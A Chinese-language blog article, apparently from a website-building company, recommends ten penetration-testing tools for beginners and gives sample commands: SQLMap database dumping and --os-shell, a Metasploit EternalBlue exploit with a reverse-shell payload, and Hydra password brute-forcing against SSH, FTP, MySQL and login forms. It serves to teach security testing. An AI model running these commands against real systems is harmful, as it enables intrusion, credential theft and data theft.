尧图建网站 尧图建网站 YAOTU WEB BUILD 免费咨询
ARTICLE DETAIL

资讯详情

深耕网站建设与建站编程的一线实战洞察。

网安新手必装的10个神器工具,第3个直接封神

网安新手必装的10个神器工具,第3个直接封神 做网络安全工具就是你的武器。一把好刀能让你在战场上事半功倍一套好工具能让你在渗透测试中如虎添翼。但新手最头疼的就是工具太多了到底该用哪个今天这篇文章我从自己用过的上百个网安工具里精选出10个新手必装的神器。每一个都是我日常高频使用、经过实战检验的好东西。尤其是第3个用过的人都说封神。建议先收藏再慢慢装。第1个Nmap —— 信息收集的望远镜一句话介绍网络扫描之王渗透测试第一步必用工具。NmapNetwork Mapper是网络安全领域最著名的端口扫描工具没有之一。它可以帮你探测目标主机是否在线、开放了哪些端口、跑的是什么服务、甚至操作系统是什么版本。新手必学命令# 基础扫描扫描目标开放端口nmap192.168.1.1# 扫描指定端口nmap-p80,443,3306192.168.1.1# 全端口扫描1-65535nmap -p-192.168.1.1# 服务版本探测看端口后面跑的是什么软件、什么版本nmap-sV192.168.1.1# 操作系统探测nmap-O192.168.1.1# 综合扫描常用参数组合一步到位nmap-sS-sV-O-p-192.168.1.1为什么新手必装信息收集是渗透测试的第一步而Nmap是信息收集阶段最核心的工具。你后面学的每一个漏洞利用前提都是先用Nmap找到目标开放了什么服务。第2个Burp Suite —— Web安全的瑞士军刀一句话介绍Web渗透测试必备神器抓包改包重放一把梭。如果说Web安全只能装一个工具那一定是Burp Suite。它是目前最流行的Web应用安全测试工具功能强大到离谱拦截请求、修改参数、重放攻击、漏洞扫描、爬虫、暴力破解……几乎你能想到的Web测试功能它都有。新手最常用的4个模块模块功能使用场景Proxy代理拦截和修改HTTP请求抓包看请求内容、修改参数测试Repeater重放器重放和修改请求手动测试漏洞、反复调整PayloadIntruder入侵者自动化攻击暴力破解、模糊测试、批量探测Decoder解码器编码解码转换Base64、URL编码、Hex等转换新手入门操作浏览器安装SwitchyOmega插件设置代理为127.0.0.1:8080打开Burp SuiteProxy模块开启拦截浏览器访问任意网站Burp就能抓到请求右键发送到Repeater就可以改参数重放了为什么新手必装做Web安全你80%的时间都在和HTTP请求打交道。Burp Suite就是你和HTTP之间的桥梁不会用Burp等于Web安全还没入门。第3个Kali Linux —— 渗透测试的军火库一句话介绍预装了600安全工具的操作系统网安人的标配系统。来了就是这个第3个直接封神。Kali Linux是基于Debian的Linux发行版专门为数字取证和渗透测试而设计。它最牛的地方在于预装了600多个安全工具从信息收集到漏洞利用、从密码破解到无线攻击、从社会工程学到逆向工程应有尽有。你不需要一个个去下载安装工具装完Kali所有工具都在里面了开箱即用。Kali里最常用的工具分类信息收集nmap、whois、dig、theHarvester 漏洞分析searchsploit、nikto、sqlmap Web应用burpsuite、dirb、wpscan 密码攻击hydra、john、hashcat、crunch 无线攻击aircrack-ng、reaver 逆向工程ghidra、radare2 取证工具autopsy、binwalk、foremost 社会工程学setoolkit、msfvenom新手安装建议不要直接装物理机先用VMware虚拟机装玩熟了再说内存至少分配4G硬盘至少50G装完第一件事改root密码、更新源、装中文输入法快照功能一定要用搞坏了直接回滚不用重装为什么说它封神一个操作系统把网安领域90%的工具都给你预装好了而且全部免费、持续更新。你不需要花时间找工具、配环境打开就能开始学习和实战。对于新手来说Kali就是最好的起点没有之一。第4个SQLMap —— SQL注入的自动化收割机一句话介绍SQL注入自动化利用神器一条命令拖库不是梦。SQLMap是一个开源的SQL注入自动化工具它可以自动检测SQL注入漏洞、自动选择注入技术、自动获取数据库数据甚至直接拿到服务器权限。新手必学命令# 检测是否存在SQL注入sqlmap-uhttp://target.com/news.php?id1# 获取所有数据库名sqlmap-uhttp://target.com/news.php?id1--dbs# 获取指定数据库的所有表名sqlmap-uhttp://target.com/news.php?id1-Ddatabase_name--tables# 获取指定表的所有列名sqlmap-uhttp://target.com/news.php?id1-Ddatabase_name-Ttable_name--columns# 导出指定字段的数据sqlmap-uhttp://target.com/news.php?id1-Ddatabase_name-Ttable_name-Cusername,password--dump# 一键获取所有数据拖库sqlmap-uhttp://target.com/news.php?id1--dump-all# 尝试获取操作系统Shellsqlmap-uhttp://target.com/news.php?id1--os-shell为什么新手必装SQL注入是Web安全最经典、最常见的漏洞类型也是新手入门必学的漏洞。SQLMap能帮你把注入过程自动化让你专注于理解注入原理而不是手写字节流。但记住工具是辅助原理才是根本一定要先理解SQL注入的原理再用SQLMap。第5个Metasploit —— 漏洞利用的乐高积木一句话介绍全球最流行的渗透测试框架漏洞利用模块多到用不完。Metasploit Framework简称MSF是一个开源的渗透测试框架它内置了大量的漏洞利用模块、Payload生成器、辅助扫描模块。你可以把它理解成一个漏洞利用的乐高积木——选择目标漏洞、选择Payload、设置参数然后一键执行。新手必学操作# 启动Metasploit控制台msfconsole# 搜索漏洞利用模块以永恒之蓝为例search ms17_010# 使用指定模块use exploit/windows/smb/ms17_010_eternalblue# 查看模块需要设置的参数show options# 设置目标IPsetRHOSTS192.168.1.100# 设置Payload反弹ShellsetPAYLOAD windows/x64/meterpreter/reverse_tcp# 设置本机IP接收反弹连接setLHOST192.168.1.50# 执行攻击exploit为什么新手必装MSF是内网渗透和主机漏洞利用的核心工具。学会用MSF你就能复现各种经典漏洞永恒之蓝、心脏滴血等理解漏洞利用的完整流程。而且MSF的Meterpreter是最强大的后渗透工具之一拿到Shell之后的操作几乎全靠它。第6个Wireshark —— 网络流量的显微镜一句话介绍最强大的网络协议分析器抓包分析流量的神器。Wireshark是一个免费开源的网络协议分析器它可以捕获网络中的数据包并把数据包的内容详细展示出来。小到TCP三次握手大到HTTP完整请求Wireshark都能给你拆解得明明白白。新手常用功能抓包过滤只抓你想看的流量 - host 192.168.1.100 只抓指定IP的流量 - port 80 只抓80端口的流量 - tcp 只抓TCP协议 - http 只抓HTTP协议 显示过滤抓完后筛选想看的内容 - ip.addr 192.168.1.100 - tcp.port 443 - http.request.method POST 右键追踪流查看完整的TCP/HTTP会话内容为什么新手必装学网络安全不懂网络协议等于空中楼阁。Wireshark能让你看到网络流量的真实样子帮你直观理解TCP/IP、HTTP、DNS等协议的工作原理。而且在应急响应和流量分析中Wireshark是排查攻击痕迹的核心工具。第7个Hydra —— 密码爆破的攻城锤一句话介绍支持50协议的在线密码爆破工具弱口令检测必备。Hydra九头蛇是一个并行化的登录密码爆破工具支持几乎所有常见的网络协议SSH、FTP、SMB、RDP、MySQL、HTTP表单、Redis……只要是需要用户名密码登录的服务Hydra几乎都能爆破。新手必学命令# 爆破SSHhydra-Luser.txt-Ppass.txt ssh://192.168.1.100# 爆破FTPhydra-Luser.txt-Ppass.txt ftp://192.168.1.100# 爆破MySQLhydra-Luser.txt-Ppass.txt mysql://192.168.1.100# 爆破HTTP POST登录表单hydra-Luser.txt-Ppass.txt192.168.1.100 http-post-form/login.php:user^USER^pass^PASS^:F失败# 指定线程数速度更快hydra-Luser.txt-Ppass.txt-t16ssh://192.168.1.100为什么新手必装弱口令是内网渗透中最常见、成功率最高的攻击方式之一。很多服务器的SSH、数据库、后台管理系统都在用弱口令123456、admin、password等。学会用Hydra爆破弱口令你在内网中就能快速横向移动。当然只能在授权环境下使用未经授权的爆破是违法行为。第8个Dirsearch —— 目录扫描的探路者一句话介绍高速Web目录扫描工具帮你找到网站隐藏的路径和文件。Dirsearch是一个用Python写的Web目录扫描工具它可以通过字典暴力枚举网站的目录和文件帮你发现后台管理页面、备份文件、配置文件、测试页面等隐藏的路径。新手必学命令# 基础扫描python3 dirsearch.py-uhttp://target.com# 指定字典python3 dirsearch.py-uhttp://target.com-w/path/to/dict.txt# 指定扩展名扫描.php .html .bak等后缀python3 dirsearch.py-uhttp://target.com-ephp,html,bak,zip# 递归扫描扫描到目录后继续深入python3 dirsearch.py-uhttp://target.com-r# 指定线程数python3 dirsearch.py-uhttp://target.com-t50# 排除指定状态码python3 dirsearch.py-uhttp://target.com-x404,403为什么新手必装做Web渗透信息收集阶段除了端口和服务Web目录和文件也是重点。很多网站的后台、phpinfo、备份文件、.git泄露都是通过目录扫描发现的。Dirsearch速度快、支持递归、可定制性强是目录扫描的首选工具。第9个SearchSploit —— 漏洞利用的搜索引擎一句话介绍Exploit-DB的本地搜索工具找POC和EXP一键搞定。SearchSploit是Kali自带的一个命令行工具它把Exploit-DB全球最大的漏洞利用代码库的所有内容存在本地你可以直接在终端搜索漏洞利用代码不用打开浏览器翻网页。新手必学命令# 搜索漏洞利用代码searchsploit eternalblue# 搜索特定软件和版本searchsploit apache2.4.49# 只搜索标题更精确searchsploit-tsql injection# 查看漏洞利用代码的详细信息searchsploit-x12345# 复制漏洞利用代码到当前目录searchsploit-m12345# 更新漏洞库searchsploit-u为什么新手必装做漏洞复现和渗透测试你经常需要找某个漏洞的POC或EXP。SearchSploit让你在终端里就能快速搜索和复制漏洞利用代码效率比浏览器高得多。而且它是离线的没有网络也能用。第10个Notion / 语雀 —— 知识管理的第二大脑一句话介绍不是安全工具但比任何安全工具都重要。最后一个我不放工具放一个笔记软件。很多新手会问学网安需要记笔记吗我的回答是不但要记而且要系统地记。网安知识点多而杂工具命令、漏洞原理、操作步骤、踩坑经验……如果你不记笔记学了就忘等于白学。我推荐用Notion或者语雀来做知识管理建立自己的网安知识库 网络安全知识库 ├── 基础知识 │ ├── 计算机网络 │ ├── Linux命令 │ ├── Windows基础 │ └── MySQL数据库 ├── Web安全 │ ├── SQL注入 │ ├── XSS跨站脚本 │ ├── 文件上传漏洞 │ ├── 文件包含漏洞 │ └── 命令执行漏洞 ├── 工具使用 │ ├── Nmap │ ├── Burp Suite │ ├── SQLMap │ └── Metasploit ├── 漏洞复现 │ ├── 永恒之蓝MS17-010 │ ├── Log4j漏洞 │ └── 各类CVE复现 └── 学习笔记 ├── 每日学习记录 ├── 踩坑经验汇总 └── 面试题整理为什么新手必装好记性不如烂笔头。每学一个知识点、每复现一个漏洞、每踩一个坑都记下来。半年后回头看你会拥有一个属于自己的、独一无二的网安知识库。这比任何教程都值钱因为它是你亲手实践过的。结尾以上10个工具是我从新手一路走来到现在每天都在用的核心工具。最后说一句心里话工具是手段不是目的。不要为了学工具而学工具工具是用来解决问题的。先理解原理再用工具提效这才是正确的顺序。把这10个工具用熟你已经超过了80%的网安新手。剩下的就是持续学习和不断实战了。我把这10个工具的安装包、配置教程、常用命令速查表全部整理好了还有一份《网安工具大全PDF》包含50常用工具的详细使用说明。需要的朋友私信我打包发给你。
返回列表